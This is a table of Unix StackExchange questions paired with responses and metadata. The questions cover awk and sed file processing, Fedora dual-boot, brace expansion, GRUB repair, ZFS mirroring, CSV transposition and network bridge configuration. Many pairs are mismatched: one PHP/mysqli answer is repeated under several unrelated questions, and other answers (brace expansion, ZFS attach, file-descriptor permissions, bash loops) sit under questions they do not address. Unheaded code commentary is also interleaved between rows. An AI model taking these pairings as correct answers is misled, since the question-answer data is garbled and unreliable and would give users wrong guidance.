source_id | question | response | metadata
---|---|---|---|
525,853 | I have two text files cat A.txt 10,1,1,"ABC"10,1,2,"S1"10,1,2,"ABC"10,1,3,"baba"10,2,1,"S2"10,2,1,"asd"10,2,2,"S3"10,2,2,"dkkd"10,2,3,"ABC" cat B.txt 10,1,1,"ABC1"10,1,2,"S1"10,1,2,"ABC"10,1,3,"baba"10,2,1,"asd"10,2,2,"S3"10,2,2,"dkkd"10,2,4,"bokaj" I want to find the missing fields by reading from the two text files, fill in the missing fields in both files with " ", and save to two new modified files. How do I get this? Say A1.txt is a modified version of A.txt cat A1.txt 10,1,1,"ABC"10,1,2,"S1"10,1,2,"ABC"10,1,3,"baba"10,2,1,"S2"10,2,1,"asd"10,2,2,"S3"10,2,2,"dkkd"10,2,3,"ABC"10,2,4," " B1.txt is a modified version of B.txt cat B1.txt 10,1,1,"ABC1"10,1,2,"S1"10,1,2,"ABC"10,1,3,"baba"10,2,1," "10,2,1,"asd"10,2,2,"S3"10,2,2,"dkkd"10,2,3," "10,2,4,"bokaj" Make sure that the total number of lines in A1.txt is the same as that of B1.txt. I am new to bash; your answer with an explanation may help me to learn a lot. This is my MWE which I have tried so far #!/bin/bashcut -d ',' -f1,2,3 A.txt > A1.txtcut -d ',' -f1,2,3 B.txt > B1.txt## Command to print contents which are in B1.txt but not in A1.txtA=`awk 'NR==FNR{a[$0];next} !($0 in a)' A1.txt B1.txt`echo $A,'" "' >> A.txtsort A.txt## Command to print contents which are in A1.txt but not in B1.txtB=`awk 'NR==FNR{a[$0];next} !($0 in a)' B1.txt A1.txt`echo $B,'" "' >> B.txtsort B.txt | You haven't told us which OS you are using. But since you've already mentioned apt-get, I'll assume that you're using something similar to Ubuntu or Debian. These have a relatively similar configuration setup. Check 1 The package php-mysql should be dependent on php7.2-mysql or similar, so firstly check that this is installed, e.g.: dpkg --list | grep 'php.*mysql'ii php-mysql 2:7.2+69ubuntu1 all MySQL module for PHP [default]ii php7.2-mysql 7.2.19-0ubuntu0.19.04.1 amd64 MySQL module for PHP Do take a note of which version you have installed; if not 7.2 like my setup, you will need to change the later checks to match your version. Check 2 I've just looked at my Ubuntu 19.04 setup and mysqli has its own shared library, currently belonging to the php7.2-mysql package and installed to /usr/lib/php/20170718/mysqli.so . find /usr/lib/php -name mysqli.so Check 3 For PHP to use the module, it needs to be instructed to load it. Depending on the way you have set up PHP to run you may need to look in a different place. But for me, running PHP 7.2 under phpfpm, the instruction to load mysqli is located in: /etc/php/7.2/fpm/conf.d/20-mysqli.ini . Check to see if you have the module loaded with: grep mysqli.so /etc/php/7.2/*/conf.d/*/etc/php/7.2/cli/conf.d/20-mysqli.ini:extension=mysqli.so/etc/php/7.2/fpm/conf.d/20-mysqli.ini:extension=mysqli.so Make sure that whichever way you are using PHP is configured to load the module. If it is not configured to do so then you should be able to add back the configuration: cd /etc/php/7.2/fpm/conf.dln -s ../../mods-available/mysqli.ini 20-mysqli.ini Check 3 is the most likely to be the cause given the evidence you've shown, but it's also the easiest to make a mistake on. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/525853",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358639/"
]
} |
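A note on the MWE above: the `awk 'NR==FNR{a[$0];next} !($0 in a)'` idiom tests set membership only, so it cannot see that A.txt has two 10,2,1 rows while B.txt has one. A sketch of a multiset-aware approach using comm(1), with the caveat that plain sort may order duplicate-key rows slightly differently than the sample A1/B1 output:

```bash
#!/bin/bash
# keys are the first three comma-separated fields
cut -d, -f1-3 A.txt | LC_ALL=C sort > A.keys
cut -d, -f1-3 B.txt | LC_ALL=C sort > B.keys

# comm -23 = keys only in A (so B is missing them); comm -13 = keys only in B.
# Turn each missing key into a placeholder row and merge it in, so both
# output files end up with the same number of lines.
LC_ALL=C sort A.txt <(comm -13 A.keys B.keys | sed 's/$/," "/') > A1.txt
LC_ALL=C sort B.txt <(comm -23 A.keys B.keys | sed 's/$/," "/') > B1.txt
```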
525,863 | I am using the below command to search for the pattern (Rel_Tag_St_bit) and then append the following line in a file: sed -i -e '/Rel_Tag_St_bit/a\'$'\n''\ methods.mavenWithGoals("mvn so:s -f abc/pom.xml")' file Once this line is added, I need to have a newline character, because I see the next line appended after the newly added line on the same line. Sample input: Line1 (pattern match)managedScripts.Rel_Tag_St_bit("${env.templo_directory}/version.txt")Line 2 (append ) methods.mavenWithGoals("mvn so:s -f abc/pom.xml") methods.mavenWithGoals("deploy -DaltDeploymentRepository=)Line 3 (appears on second line itself) So the third line here [methods.mavenWithGoals("deploy -DaltDeploymentRepository=)] appears on the second appended line. Sample output: 1)managedScripts.Rel_Tag_St_bit("${env.templo_directory}/version.txt")2)methods.mavenWithGoals("mvn so:s -f abc/pom.xml")3)methods.mavenWithGoals("deploy -DaltDeploymentRepository=) | You haven't told us which OS you are using. But since you've already mentioned apt-get, I'll assume that you're using something similar to Ubuntu or Debian. These have a relatively similar configuration setup. Check 1 The package php-mysql should be dependent on php7.2-mysql or similar, so firstly check that this is installed, e.g.: dpkg --list | grep 'php.*mysql'ii php-mysql 2:7.2+69ubuntu1 all MySQL module for PHP [default]ii php7.2-mysql 7.2.19-0ubuntu0.19.04.1 amd64 MySQL module for PHP Do take a note of which version you have installed; if not 7.2 like my setup, you will need to change the later checks to match your version. Check 2 I've just looked at my Ubuntu 19.04 setup and mysqli has its own shared library, currently belonging to the php7.2-mysql package and installed to /usr/lib/php/20170718/mysqli.so . find /usr/lib/php -name mysqli.so Check 3 For PHP to use the module, it needs to be instructed to load it. Depending on the way you have set up PHP to run you may need to look in a different place. But for me, running PHP 7.2 under phpfpm, the instruction to load mysqli is located in: /etc/php/7.2/fpm/conf.d/20-mysqli.ini . Check to see if you have the module loaded with: grep mysqli.so /etc/php/7.2/*/conf.d/*/etc/php/7.2/cli/conf.d/20-mysqli.ini:extension=mysqli.so/etc/php/7.2/fpm/conf.d/20-mysqli.ini:extension=mysqli.so Make sure that whichever way you are using PHP is configured to load the module. If it is not configured to do so then you should be able to add back the configuration: cd /etc/php/7.2/fpm/conf.dln -s ../../mods-available/mysqli.ini 20-mysqli.ini Check 3 is the most likely to be the cause given the evidence you've shown, but it's also the easiest to make a mistake on. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/525863",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/312307/"
]
} |
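The quoting in that sed invocation is fragile; a sketch of the classic `a\` form, where the appended text is its own script line, looks like this. Each `a` text block ends at the first unescaped newline, so sed always emits it as a separate output line, which may avoid the glued-line symptom described above:

```bash
sed -i '/Rel_Tag_St_bit/a\
methods.mavenWithGoals("mvn so:s -f abc/pom.xml")' file
```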
525,879 | My current OS is Windows 7. I have 1 HDD (1 TB). It has a drive C: (100GB), a drive D: (~800GB), and unallocated disk space (100 GB) I intend to use for Fedora. Can I dual boot Fedora 30 with Windows 7 (to use both of these OSes)? | You haven't told us which OS you are using. But since you've already mentioned apt-get, I'll assume that you're using something similar to Ubuntu or Debian. These have a relatively similar configuration setup. Check 1 The package php-mysql should be dependent on php7.2-mysql or similar, so firstly check that this is installed, e.g.: dpkg --list | grep 'php.*mysql'ii php-mysql 2:7.2+69ubuntu1 all MySQL module for PHP [default]ii php7.2-mysql 7.2.19-0ubuntu0.19.04.1 amd64 MySQL module for PHP Do take a note of which version you have installed; if not 7.2 like my setup, you will need to change the later checks to match your version. Check 2 I've just looked at my Ubuntu 19.04 setup and mysqli has its own shared library, currently belonging to the php7.2-mysql package and installed to /usr/lib/php/20170718/mysqli.so . find /usr/lib/php -name mysqli.so Check 3 For PHP to use the module, it needs to be instructed to load it. Depending on the way you have set up PHP to run you may need to look in a different place. But for me, running PHP 7.2 under phpfpm, the instruction to load mysqli is located in: /etc/php/7.2/fpm/conf.d/20-mysqli.ini . Check to see if you have the module loaded with: grep mysqli.so /etc/php/7.2/*/conf.d/*/etc/php/7.2/cli/conf.d/20-mysqli.ini:extension=mysqli.so/etc/php/7.2/fpm/conf.d/20-mysqli.ini:extension=mysqli.so Make sure that whichever way you are using PHP is configured to load the module. If it is not configured to do so then you should be able to add back the configuration: cd /etc/php/7.2/fpm/conf.dln -s ../../mods-available/mysqli.ini 20-mysqli.ini Check 3 is the most likely to be the cause given the evidence you've shown, but it's also the easiest to make a mistake on. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/525879",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358659/"
]
} |
525,921 | For example {a..c}{1..3} expands to a1 a2 a3 b1 b2 b3 c1 c2 c3 . If I wanted to print a1 b1 c1 a2 b2 c2 a3 b3 c3 , is there an analogous way to do that? What's the simplest way? | You could do: $ eval echo '{a..c}'{1..3}a1 b1 c1 a2 b2 c2 a3 b3 c3 Which then tells the shell to evaluate: echo {a..c}1 {a..c}2 {a..c}3 | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/525921",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/338440/"
]
} |
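An eval-free way to get the same transposed order is a nested loop with the numeric range on the outside; a small sketch:

```bash
for n in {1..3}; do
    for l in {a..c}; do
        printf '%s%s ' "$l" "$n"    # letter varies fastest: a1 b1 c1 a2 ...
    done
done
printf '\n'
```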
525,935 | I used to have a dual system with KDE Neon and Windows 10, all happy together on my laptop Asus s510U. One week ago, the f… Windows decided to update without questioning me. It also changed all my BIOS configuration; this action made it impossible for my Linux to boot. So what I did in sequential order is: Change the BIOS again; now Linux worked fine again. After using both systems (I can’t remember how often) without problems, I was using Linux; the next day when I started my computer I had a black screen. It doesn’t load anything. (I think I have GRUB.) So I had problems starting the live Mint USB in UEFI mode, but finally I started it, installed boot-repair, and it was supposed to repair it. (It is important to mention that I have boot in a separate partition of 500 MB.) But when I start again, it stops in the grub menu, without booting Linux. Because it didn’t work, I tried to reinstall grub manually, but I have the same results. I tried to do this in the BIOS… sdb1/EFI/neon/shimx64.efi, but it came in different nomenclature. I found the file shimx64.efi but it doesn’t boot at all. Can somebody help me? I don’t really know how to fix it. I leave you some info from boot-repair and from my system configuration. Boot successfully repaired!!! Boot Repair URL: http://paste.ubuntu.com/p/ZnGHZ4HmG5/ My disk: sudo fdisk -lDisk /dev/sdb: 119.2 GiB, 128035676160 bytes, 250069680 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 4096 bytes I/O size (minimum/optimal): 4096 bytes / 4096 bytes Disklabel type: gpt Disk identifier: xxxDevice Start End Sectors Size Type /dev/sdb1 2048 534527 532480 260M EFI System /dev/sdb2 534528 567295 32768 16M Microsoft reserved /dev/sdb3 567296 121028607 120461312 57.5G Microsoft basic data /dev/sdb4 248430592 250068991 1638400 800M Windows recovery environment /dev/sdb5 121028608 122052607 1024000 500M Linux filesystem /dev/sdb6 122052608 126148607 4096000 2G Linux swap /dev/sdb7 126148608 248429857 122281250 58.3G Linux filesystem My boot directory: /mnt/boot$ ls -al total 194116drwxr-xr-x 5 root root 4096 Jun 19 00:23 .drwxr-xr-x 25 root root 4096 Jun 19 00:23 ..-rw------- 1 root root 4049455 Jan 29 15:39 System.map-4.15.0-45-generic-rw------- 1 root root 4051528 Jun 4 20:33 System.map-4.15.0-52-generic-rw-r--r-- 1 root root 217019 Jan 29 15:39 config-4.15.0-45-generic-rw-r--r-- 1 root root 217278 Jun 4 20:33 config-4.15.0-52-genericdrwxr-xr-x 2 root root 4096 Jun 19 00:20 efidrwxr-xr-x 5 root root 4096 Jun 19 00:24 grubdrwxr-xr-x 5 root root 4096 Jun 19 00:22 grub.bak-rw-r--r-- 1 root root 57867618 Feb 24 02:26 initrd.img-4.15.0-43-generic-rw-r--r-- 1 root root 57863844 Feb 24 21:43 initrd.img-4.15.0-45-generic-rw-r--r-- 1 root root 57899212 Jun 19 00:23 initrd.img-4.15.0-52-generic-rw------- 1 root root 8281848 Jan 29 16:11 vmlinuz-4.15.0-45-generic-rw------- 1 root root 8294136 Jun 4 20:39 vmlinuz-4.15.0-52-generic Efi: mint@mint:/tmp/boot$ sudo efibootmgr -vBootCurrent: 0005Timeout: 1 secondsBootOrder: 0001,0000,0003,0002,0004,0005Boot0000* Windows Boot Manager HD(1,GPT,533df41a-4161-4850-a540-122090825ef0,0x800,0x82000)/File(\EFI\MICROSOFT\BOOT\BOOTMGFW.EFI)WINDOWS.........x...B.C.D.O.B.J.E.C.T.=.{.9.d.e.a.8.6.2.c.-.5.c.d.d.-.4.e.7.0.-.a.c.c.1.-.f.3.2.b.3.4.4.d.4.7.9.5.}....................Boot0001* neon HD(1,GPT,533df41a-4161-4850-a540-122090825ef0,0x800,0x82000)/File(\EFI\NEON\SHIMX64.EFI)Boot0002* Efi prueba 
HD(1,GPT,533df41a-4161-4850-a540-122090825ef0,0x800,0x82000)/File(\bootx64.efi)Boot0003* Hard Drive BBS(HD,,0x0)..GO..NO........o.T.O.S.H.I.B.A. .M.Q.0.4.A.B.F.1.0.0....................A...........................>..Gd-.;.A..MQ..L. . . . . . . . . . .4. .N.8.P.8.1.A.T.K........BO..NO........o.T.O.S.H.I.B.A. .T.H.N.S.N.K.1.2.8.G.V.N.8....................A...........................>..Gd-.;.A..MQ..L. . . . . . . . .8.4.S.N.0.1.9.K.M.T.T.Y........BO..NO........c.A.D.A.T.A. .U.S.B. .F.l.a.s.h. .D.r.i.v.e. .1.1.0.0....................A.......................6..Gd-.;.A..MQ..L.2.6.8.2.6.2.1.0.0.1.1.7.0.0.1.9........BOBoot0004* linux efi pma HD(1,GPT,533df41a-4161-4850-a540-122090825ef0,0x800,0x82000)/File(\grubx64.efi)Boot0005* UEFI: ADATA USB Flash Drive 1100, Partition 1 PciRoot(0x0)/Pci(0x14,0x0)/USB(2,0)/HD(1,MBR,0x70d993e5,0x800,0x1c3d800)..BO In my /etc/fstab the part mounting the boot partition was commented out. That is very strange because I am sure I didn’t do that. My grub.cfg has this: search.fs_uuid a5da64fd-c3bd-4689-a6ef-c5fc1ddd17ac root hd1,gpt7 set prefix=($root)'/boot/grub'configfile $prefix/grub.cfg Which points to the non-boot partition. I have 2 different boot directories, one on the partition (the original) and another under /. Maybe in one update the system changed... | You could do: $ eval echo '{a..c}'{1..3}a1 b1 c1 a2 b2 c2 a3 b3 c3 Which then tells the shell to evaluate: echo {a..c}1 {a..c}2 {a..c}3 | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/525935",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358701/"
]
} |
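For reference, a common live-USB repair sequence for this kind of wrong-prefix grub.cfg, assuming the layout from the fdisk output above (sdb7 = root, sdb5 = /boot, sdb1 = EFI system partition); this is a sketch, not a guaranteed fix:

```bash
sudo mount /dev/sdb7 /mnt
sudo mount /dev/sdb5 /mnt/boot
sudo mount /dev/sdb1 /mnt/boot/efi
for d in /dev /proc /sys; do sudo mount --bind "$d" "/mnt$d"; done
sudo chroot /mnt grub-install --target=x86_64-efi
sudo chroot /mnt update-grub    # regenerate grub.cfg with the correct root/prefix
```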
525,950 | I have a one-drive zfs pool named data on my desktop computer, created with something like zpool create data /dev/mapper/data (zfs on luks). I would like to convert it into a raid1 pool, but only have 1 more drive to play with, and one more slot in my machine. Can I somehow tell zfs to convert my data pool into a mirror, using the new drive as the 2nd drive in the set? If that is not possible, is there a way to create a new degraded mirror pool using just the new drive (since I don't have a 2nd drive yet)? That would give me a chance to copy my data from the old pool into the new mirror pool, then add the original drive to the new pool. | I'm new to FreeBSD, and haven't yet used ZFS. However, based on my research, why not use #zpool attach mypool /dev/sdX /dev/sdY instead of all of that? Should automatically convert the pool to a mirror. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/525950",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358715/"
]
} |
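Spelled out for the pool in the question; /dev/mapper/data2 is a hypothetical name for the second LUKS-opened drive:

```bash
# attach a second device to the existing single-disk vdev, turning it into a mirror
zpool attach data /dev/mapper/data /dev/mapper/data2
zpool status data    # shows mirror-0 and the resilvering progress
```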
525,954 | Can we transpose multiple sets of values into rows in Linux? Below is the sample data I have: UID,UNAME,UKEY,UFROMDATE,UTODATE,UL,ULID,UF,UFID"1","abc","12344321","2019-01-01","2019-01-10","1","1A","X1","XA""2","abc","12344322","2019-02-01","2019-02-10","2","2A","X2","XB" Can we transpose the above data into the below format? UID,UNAME,UKEY,UFROMDATE,UTODATE,ColVal,ID,ColName"1","abc","12344321","2019-01-01","2019-01-10","1","1A",UL"1","abc","12344321","2019-01-01","2019-01-10","X1","XA",UF"2","abc","12344322","2019-02-01","2019-02-10","2","2A",UL"2","abc","12344322","2019-02-01","2019-02-10","X2","XB",UF Please help me with any suggestions. | I'm new to FreeBSD, and haven't yet used ZFS. However, based on my research, why not use #zpool attach mypool /dev/sdX /dev/sdY instead of all of that? Should automatically convert the pool to a mirror. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/525954",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/353888/"
]
} |
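A sketch of the requested transposition in awk, assuming the fixed nine-column layout of the sample (columns 6 and 7 are the UL value/ID pair, 8 and 9 the UF pair):

```bash
awk -F, 'NR == 1 {
    print "UID,UNAME,UKEY,UFROMDATE,UTODATE,ColVal,ID,ColName"
    next
}
{
    key = $1 FS $2 FS $3 FS $4 FS $5
    print key FS $6 FS $7 FS "UL"    # first value/ID pair
    print key FS $8 FS $9 FS "UF"    # second value/ID pair
}' input.csv
```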
526,018 | I have an old-ish Lenovo ideapad 110-15ISK with Fedora 30 installed (and a LUKS-encrypted SSD as storage). When I boot this machine: The "Lenovo" logo (actually just a text) is displayed, briefly. The boot manager screen is displayed with selectable kernels I select a kernel. The "Lenovo" logo is displayed, briefly. A password text entry widget is displayed with the "fedora(∫)" logo at the bottom of the screen. I enter the password to decrypt the LUKS-ified SSD. The boot process continues while the following is displayed: The "Lenovo" logo in the middle of the screen and The "fedora(∫)" logo at the bottom of the screen. Finally the KDE login screen takes over. Why does (7) happen? How is it possible to have the "Logo mashup" unless Fedora comes with a special selection of manufacturer logos to display? Because at that point, it is systemd that is in charge of the monitor (maybe via the framebuffer ). It is quite mysterious. | This is the result of Hans de Goede’s work on flicker-free boot in Fedora. Hans developed a new Plymouth theme which takes the firmware bootsplash and adds the Fedora logo to it, until boot finishes and the desktop environment takes over. This works because bootsplash logos are now exposed as an ACPI resource, which you can see in /sys/firmware/acpi/bgrt on systems which support this. See also the flicker-free FAQ . (This also explains how to modify the Plymouth theme so that the logo is still displayed along with the disk decryption password prompt.) | {
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/526018",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/52261/"
]
} |
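On a system that supports it, the firmware logo really is just a handful of sysfs files under the path mentioned in the answer, e.g.:

```bash
ls /sys/firmware/acpi/bgrt
# image  status  type  version  xoffset  yoffset
```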
526,064 | Here is my sample file user@linux:~$ cat file.txt Line 1Line 2Line 3Line 4Line 5user@linux:~$ I can print line 2-4 with grep -A2 'e 2' file.txt user@linux:~$ grep -A2 'e 2' file.txt Line 2Line 3Line 4user@linux:~$ I can also print out the line number as well with grep -n user@linux:~$ grep -nA2 'e 2' file.txt 2:Line 23-Line 34-Line 4user@linux:~$ Also, the same thing can be accomplished with sed -n 2,4p file.txt user@linux:~$ sed -n 2,4p file.txt Line 2Line 3Line 4user@linux:~$ But I'm not sure how to print out the line number with sed Would it be possible to print out the line number with sed ? | AWK: awk 'NR==2,NR==4{print NR" "$0}' file.txt Double sed: sed '2,4!d;=' file.txt | sed 'N;s/\n/ /' glen jackmann 's sed and paste: sed '2,4!d;=' file.txt | paste -d: - - bart 's Perl version: perl -ne 'print "$. $_" if 2..4' file.txt cat and sed: cat -n file.txt | sed -n '2,4p' Also see this answer to a similar question. A bit of explanation: sed -n '2,4p' and sed '2,4!d' do the same thing: the first only prints lines between the second and the fourth (inclusive), the latter "deletes" every line except those. sed = prints the line number followed by a newline . See the manual . cat -n in the last example can be replaced by nl or grep -n '' . | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/526064",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/-1/"
]
} |
526,088 | I need to copy all files from one UNIX path to another within the same server. However, there are some .zip files I want to exclude while copying. How can I achieve this using the cp command options? | AWK: awk 'NR==2,NR==4{print NR" "$0}' file.txt Double sed: sed '2,4!d;=' file.txt | sed 'N;s/\n/ /' glen jackmann 's sed and paste: sed '2,4!d;=' file.txt | paste -d: - - bart 's Perl version: perl -ne 'print "$. $_" if 2..4' file.txt cat and sed: cat -n file.txt | sed -n '2,4p' Also see this answer to a similar question. A bit of explanation: sed -n '2,4p' and sed '2,4!d' do the same thing: the first only prints lines between the second and the fourth (inclusive), the latter "deletes" every line except those. sed = prints the line number followed by a newline . See the manual . cat -n in the last example can be replaced by nl or grep -n '' . | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/526088",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358833/"
]
} |
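cp itself has no exclude option; two common workarounds, sketched with placeholder paths, are bash's extglob negation and rsync's filter rules:

```bash
# bash: copy everything except *.zip (add -r if subdirectories are involved)
shopt -s extglob
cp -- /src/path/!(*.zip) /dest/path/

# or let rsync do the filtering
rsync -av --exclude='*.zip' /src/path/ /dest/path/
```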
526,172 | When a process successfully gets an fd using open(flags=O_RDWR) , it will be able to read/write to that file as long as the fd isn't closed (regular file on a local filesystem), even if some other process uses chmod to cancel the read/write permission for the corresponding user. Does the Linux kernel check file permissions on the inode or the open file description? But how about when the process tries to execute that file using execveat , will the kernel read the disk to check the x bit and suid bit permission? What kind of permissions are recorded in the open file description: does it contain a full ACL or simply readable/writable bits, so that every other operation ( execveat , fchdir , fchmod , etc.) will check the on-disk info? What if I transfer this fd to another process of another user whose fsuid doesn't have the read/write/execute bit on that file (according to the on-disk filesystem info), will that receiver process be able to read/write/execute the file through the fd? | execveat is handled by do_open_execat , which specifies that it wants to be able to open the target file for execution. The file opening procedure is handled via do_filp_open and path_openat , with a path-walking process which is documented separately . The result of all this, regardless of how the process starts, is a struct file and its associated struct inode which stores the file’s mode and, if relevant, a pointer to the ACLs. The inode data structure is shared by all the file descriptions which reference the same inode. The kernel guarantees that the inode information in memory is up-to-date when retrieved. This can be maintained in the dentry and inode caches in some cases (local file systems, ext4, ext3, XFS, and btrfs in particular), in others it will involve some I/O (in particular over the network). The permission check itself is performed a little later, by bprm_fill_uid ; that takes into account the current permissions on the inode, and the current privileges of the calling user. As discussed previously , permissions are only verified when a file is opened, mapped, or its metadata altered, not when it’s read or written; so file descriptors can be passed across processes without new permission checks. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526172",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/301641/"
]
} |
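The open-time-only permission check is easy to demonstrate from a shell:

```bash
echo hello > f
exec 3< f      # permission is checked here, when the fd is opened
chmod 000 f    # revoke every permission bit on disk
cat <&3        # still prints "hello": reads on an open fd are not re-checked
exec 3<&-      # close the descriptor
```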
526,204 | I would like to replace the below input about storage disks with output in the below presented format. The below script is almost working for me, but it doesn't work for T0. It seems there is a problem with properly reading 0s at the end of the number in the 'replaceTier' function. Could somebody assist me in correcting it? Thanks in advance. **INPUT IN FILE:**displayName=00:19:78sizeInKB=26214720dpPoolID=1displayName=00:FE:B0sizeInKB=2251536384dpPoolID=110displayName=00:FE:B1sizeInKB=2251536384dpPoolID=110**EXPECTED OUTPUT:**1978,T1FEB0,T0FEB1,T0replaceTier=( {1,11,12,13,14,15,16,17,18,19,51,61,71,81,100}:T1 {2,21,22,23,24}:T2 3:T3 {10,110}:T0 90:SVC_T1 91:SVC_T2 92:SVC_T1)#while read -r name serial model uid do cat "$DIR"/"$name"_disks.log | grep -v 'sizeInKB' | cut -d "=" -f2 | sed 's/\://g' | xargs -n2 | sed 's/\ /\,/g' | cut -c 3- | grep -v ',-1' > "$DIR"/"$name"_output.log for row in "${replaceTier[@]}"; do original="$(echo $row | cut -d: -f1)"; new="$(echo $row | cut -d: -f2)"; sed -i -e "s/,${original}.*/,${new}/g" "$DIR"/"$name"_output.log; donedone < /storage/logs/HDSlist.txt | execveat is handled by do_open_execat , which specifies that it wants to be able to open the target file for execution. The file opening procedure is handled via do_filp_open and path_openat , with a path-walking process which is documented separately . The result of all this, regardless of how the process starts, is a struct file and its associated struct inode which stores the file’s mode and, if relevant, a pointer to the ACLs. The inode data structure is shared by all the file descriptions which reference the same inode. The kernel guarantees that the inode information in memory is up-to-date when retrieved. This can be maintained in the dentry and inode caches in some cases (local file systems, ext4, ext3, XFS, and btrfs in particular), in others it will involve some I/O (in particular over the network). The permission check itself is performed a little later, by bprm_fill_uid ; that takes into account the current permissions on the inode, and the current privileges of the calling user. As discussed previously , permissions are only verified when a file is opened, mapped, or its metadata altered, not when it’s read or written; so file descriptors can be passed across processes without new permission checks. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526204",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/175982/"
]
} |
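The T0 failure in the script above comes from the unanchored pattern: the T1 entry 1 is processed first, and s/,1.*/,T1/g happily matches ,110 before the {10,110}:T0 rule is ever reached. Anchoring the match to the end of the line is a minimal fix, sketched here:

```bash
# replace only when the pool ID is the entire last field
sed -i -e "s/,${original}\$/,${new}/" "$DIR"/"$name"_output.log
```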
526,399 | I was trying to create a function that loops over inputs and executes a command - regardless of how they are delimited. function loop { # Args # 1: Command # 2: Inputs for input in "$2" ; do $1 $input done} declare -a arr=("1" "2" "3")$ loop echo "$arr[@]"1$ loop echo 1 2 31$ loop echo $arr1 However as per this answer, for .. in .. works for arrays: for item in "${arr[@]}" ; do echo "$item"done It also works for space separated values: for item in 1 2 3 ; do echo "$item"done In a nutshell, how do I get the effect of "${arr[@]}" and 1 2 3 while passing it an argument. Also would it be possible to extend this notion of looping to any kind of delimited items for example \n separated contents like a file? In Python we have a concept of iterators , is there something similar in bash? | You have not called the array properly. $arr will only expand to the first element in the array and $arr[@] will expand to the first element with the literal string [@] appended to it. To call all elements of an array use: "${arr[@]}" The other issue you have is that $2 only contains the second positional parameter, where you are trying to iterate through the 3rd, 4th, 5th, etc. They will all be stored in $@ . To accomplish your goal you could do something like: function loop { local command=$1 shift for i in "$@"; do "$command" "$i" done} This will set command to the first positional parameter and then shift so that $@ can be used to loop through the remaining ones. Then you just need to call the array properly: $ declare -a arr=("element1" "element2" "element3")$ loop echo "${arr[@]}"element1element2element3$ loop printf 'hello ' 'world\n'hello world$ loop touch file1 file2 file3$ lsfile1 file2 file3 If you want this function to be able to accept various delimiters you could do something like: function loop { local command=$1 local delim=$2 shift 2 set -- $(tr "$delim" ' ' <<<"$@") for i in "$@"; do "$command" "$i" done} This means you have to specify what delimiter is being used via the second parameter though, like: $ loop echo '|' 'one|two|three'onetwothree$ loop echo '\n' "$(printf '%s\n' 'one' 'two' 'three')"onetwothree However this has some bugs (If you specify a custom delimiter it will still also delimit by whitespace) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526399",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/78548/"
]
} |
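A delimiter-safe variant of that last function, as a sketch, sets IFS locally instead of going through tr (note that the unquoted expansion still performs pathname globbing, so set -f may be wanted for hostile input):

```bash
function loop {
    local command=$1 delim=$2
    shift 2
    local IFS=$delim    # word splitting now happens only on the delimiter
    for i in $*; do
        "$command" "$i"
    done
}

loop echo '|' 'one|two|three'    # one / two / three, embedded spaces left intact
```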
526,410 | We have network interface eno1 and configured it as br1 allow-hotplug eno1iface eno1 inet manualauto br1 iface br1 inet static address 208.43.222.51 network 255.255.255.248 netmask 255.255.255.0 broadcast 208.43.222.55 gateway 208.43.222.49 bridge_ports eno1 bridge_stp off bridge_fd 0 bridge_maxwait 0 Now we want more IPs and ordered one more /29 subnet from the ISP, 208.43.221.40/29. How do we configure it using /etc/network/interfaces to add it to the existing br1? | You have not called the array properly. $arr will only expand to the first element in the array and $arr[@] will expand to the first element with the literal string [@] appended to it. To call all elements of an array use: "${arr[@]}" The other issue you have is that $2 only contains the second positional parameter, where you are trying to iterate through the 3rd, 4th, 5th, etc. They will all be stored in $@ . To accomplish your goal you could do something like: function loop { local command=$1 shift for i in "$@"; do "$command" "$i" done} This will set command to the first positional parameter and then shift so that $@ can be used to loop through the remaining ones. Then you just need to call the array properly: $ declare -a arr=("element1" "element2" "element3")$ loop echo "${arr[@]}"element1element2element3$ loop printf 'hello ' 'world\n'hello world$ loop touch file1 file2 file3$ lsfile1 file2 file3 If you want this function to be able to accept various delimiters you could do something like: function loop { local command=$1 local delim=$2 shift 2 set -- $(tr "$delim" ' ' <<<"$@") for i in "$@"; do "$command" "$i" done} This means you have to specify what delimiter is being used via the second parameter though, like: $ loop echo '|' 'one|two|three'onetwothree$ loop echo '\n' "$(printf '%s\n' 'one' 'two' 'three')"onetwothree However this has some bugs (If you specify a custom delimiter it will still also delimit by whitespace) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526410",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/357586/"
]
} |
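One common pattern is to hang the extra range off the existing br1 stanza with up/down hooks; a sketch, where .41 is assumed to be the first usable host of the new 208.43.221.40/29 block (adjust to whatever the ISP actually routed):

```
# added inside the existing "iface br1 inet static" stanza
    up   ip addr add 208.43.221.41/29 dev br1
    down ip addr del 208.43.221.41/29 dev br1
```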
